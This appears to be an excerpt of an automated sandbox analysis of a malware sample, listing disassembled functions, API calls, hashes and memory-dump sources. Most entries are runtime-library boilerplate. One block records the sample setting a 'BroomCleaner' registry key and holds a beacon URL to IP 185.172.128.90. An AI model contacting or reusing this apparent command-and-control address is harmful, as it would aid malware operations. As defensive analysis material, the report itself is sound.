                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                              • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 05B863C6
                                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 05B863EE
                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 05B86471
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05B86492
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                              • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                              • API String ID: 1996196666-529226407
                                                                                                                                                                                                                              • Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                              • Instruction ID: 29b613f055809f98972381ddf793a45ff8822c878789424936ac3029dfcb5ea8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77319A71A00219EFDF149FA8CC94AFEBB79FB48254F0455ADE80277251C7726D05CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
                                                                                                                                                                                                                              • Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F2FA
                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F305
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F310
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F364
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F36F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F37A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F385
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                              • Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 05B643F5
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 05B64404
                                                                                                                                                                                                                              • int.LIBCPMT ref: 05B6441B
                                                                                                                                                                                                                                • Part of subcall function 05B6157F: std::_Lockit::_Lockit.LIBCPMT ref: 05B61590
                                                                                                                                                                                                                                • Part of subcall function 05B6157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05B615AA
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 05B64424
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 05B64455
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 05B6446B
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 05B64491
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                                                                                              • Instruction ID: 6a2360eb67e8238a01fd11ff7a14adb849d4e109c4f20688cc656282eb38ede5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E411C472A00518DBCF04EBA8D849AEE7775FF84214F1545EAE816A7290DF78BA01C7E0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                              • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: f83ec763f7aa7bb0e71e0afca0b1f6b0fdff92c65dad6a05f866a88dfb1858cd
                                                                                                                                                                                                                              • Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f83ec763f7aa7bb0e71e0afca0b1f6b0fdff92c65dad6a05f866a88dfb1858cd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 05B63656
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 05B63665
                                                                                                                                                                                                                              • int.LIBCPMT ref: 05B6367C
                                                                                                                                                                                                                                • Part of subcall function 05B6157F: std::_Lockit::_Lockit.LIBCPMT ref: 05B61590
                                                                                                                                                                                                                                • Part of subcall function 05B6157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05B615AA
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 05B63685
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 05B636B6
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 05B636CC
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 05B636F2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                                                                                              • Instruction ID: 5febd39db5755c11e5c92c6138c656394535b4df22a5de936f3f91b2d1e4f48f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F311A372E041299BCB05EBA8C808AEE77B5EF44314F14099AE916B7290DF78AA04C7D4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 05B63861
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 05B63870
                                                                                                                                                                                                                              • int.LIBCPMT ref: 05B63887
                                                                                                                                                                                                                                • Part of subcall function 05B6157F: std::_Lockit::_Lockit.LIBCPMT ref: 05B61590
                                                                                                                                                                                                                                • Part of subcall function 05B6157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05B615AA
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 05B63890
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 05B638C1
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 05B638D7
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 05B638FD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                                                                                              • Instruction ID: 94c90733cee5f8556560073f9706d4d04d3ae873359fda28736436b9b8123f03
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE11A772E00114DBCB05EBA8C808AFEB7B5EF44714F14499AE916B7290DF78AA04C7D0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: 963e99d2a39154fcb044ec2c7a4747b24090c51ae6fc69322cb5dc4ce8462b5c
                                                                                                                                                                                                                              • Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 963e99d2a39154fcb044ec2c7a4747b24090c51ae6fc69322cb5dc4ce8462b5c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1202896665-0
                                                                                                                                                                                                                              • Opcode ID: 0fee8ea1c5c1463a8a6083934962415d071b04a09301998d0775e2a02c1fcd71
                                                                                                                                                                                                                              • Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fee8ea1c5c1463a8a6083934962415d071b04a09301998d0775e2a02c1fcd71
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 05B87E37
                                                                                                                                                                                                                              • __FindPESection.LIBCMT ref: 05B87E51
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 876702719-0
                                                                                                                                                                                                                              • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction ID: 94514a1e67d8d75339d0c32965bf0c51347cabf5509daa622983180949d20780
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAA1AD72A04655CBCB15EF58C884ABDB7B5FB08318F2466A9E805AB351DB36FC01CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
                                                                                                                                                                                                                              • __FindPESection.LIBCMT ref: 00427BEA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 876702719-0
                                                                                                                                                                                                                              • Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,05B76BF7,00000001,00000001,?), ref: 05B76A00
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,05B76BF7,00000001,00000001,?,?,?,?), ref: 05B76A86
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 05B76B80
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 05B76B8D
                                                                                                                                                                                                                                • Part of subcall function 05B77CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77CDE
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 05B76B96
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 05B76BBB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                                                                              • Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                                                                                              • Instruction ID: b10ec967f6696d666019842b7a9e77736311c0d8232f49217ced9302b4222727
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8851F372700A1AAFDB258F64CC86EBB77AAEB45750F1542A9FD25D7240DB34FC40C6A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                              • Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                                                                                              • Instruction ID: 76ec6f6bd699df417822c6b6c069642e788c3407ef08bc95dcdee177d3146c75
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F051EB72A0460DABDF249FAD8C49EBE77B9FF49360F104199E83596190EB31F640CA74
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                                                                                              • Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                                                                                              • Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,05B6CC19,05B6A4C2), ref: 05B6CC30
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05B6CC3E
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05B6CC57
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,05B6CC19,05B6A4C2), ref: 05B6CCA9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                              • Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                                                                                              • Instruction ID: 3ebdea1b4c534a7d418f50aeabaa5bb8bb0f55795605dd81902a4c303fc21484
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 090128323493115EA7252EB5BD9CE672F55FB50772B2002BEE264840F0EF296C0045C8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
